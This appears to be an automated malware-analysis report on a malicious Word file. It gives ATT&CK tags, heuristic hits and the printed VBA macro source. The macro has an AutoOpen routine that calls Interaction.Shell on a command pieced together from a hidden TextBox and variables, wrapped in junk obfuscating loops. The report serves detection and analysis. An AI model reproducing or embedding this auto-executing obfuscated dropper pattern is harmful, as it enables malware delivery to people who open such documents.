MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The critical heuristic firing indicates a Shell() call within the VBA code, and the autoopen macro suggests immediate execution upon opening. The script attempts to use the Shell function, likely to download and execute a secondary payload, which is a common technique for malware droppers.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3765 bytes |
SHA-256: b1bc50d7f3a8e7c509fc11a741d3782a8d9ae79f52065b691ded4b9bf0b2ff42 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Z9826672168"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
X4430 = 262 - 102
j543 = 935 - 66
z941 = 614 - 194
b16190
o9483 = 804 - 461
Q438 = 963 - 530
A330 = 730 - 826
End Sub
Attribute VB_Name = "j891537430"
Function b16190()
On Error Resume Next
For Each q1466 In F059
K661 = Round(H4767 / CSng(o088))
If O2840 Or w5385 Then
r9600 = Sin(f2351)
End If
s390 = CSng(N4986 * CBool(o8647))
If G9986 > l2281 Then
h482 = Oct(Z780 - z4623 / 973 - Round(752 + Sin(Y606)))
End If
Next
J84519653 = Array(E21751797, r5246840, i223206, Interaction.Shell(("" + i226281 + F85929797 + Z9826672168.TextBox1) + u9535334 + r45727709 + b933981, 94 - 94), f331254, d45212059, W0556427)
For Each n472 In Q1263
c340 = Round(G949 / CSng(P943))
If z695 Or C699 Then
l1799 = Sin(N3502)
End If
j507 = CSng(k656 * CBool(v646))
If D031 > Y452 Then
Z061 = Oct(v3080 - d899 / 224 - Round(444 + Sin(W216)))
End If
Next
For Each n7594 In h4007
v2051 = Round(t236 / CSng(U9957))
If W4911 Or C602 Then
I232 = Sin(u5835)
End If
l6053 = CSng(B1661 * CBool(c7859))
If z0118 > I3760 Then
i446 = Oct(N2722 - w7726 / 664 - Round(517 + Sin(U714)))
End If
Next
End Function
Attribute VB_Name = "Q30883096"
Attribute VB_Name = "z504777785342"
Attribute VB_Name = "M0010709"
Attribute VB_Name = "Q307582223121"
Attribute VB_Name = "w7981085811"
Attribute VB_Name = "l1177845704"
Attribute VB_Name = "G1011057"
Attribute VB_Name = "F2868275"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Y235542137601"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Z802497006618"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "T9947086763"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "R6220835746982"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "w45484728297236"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.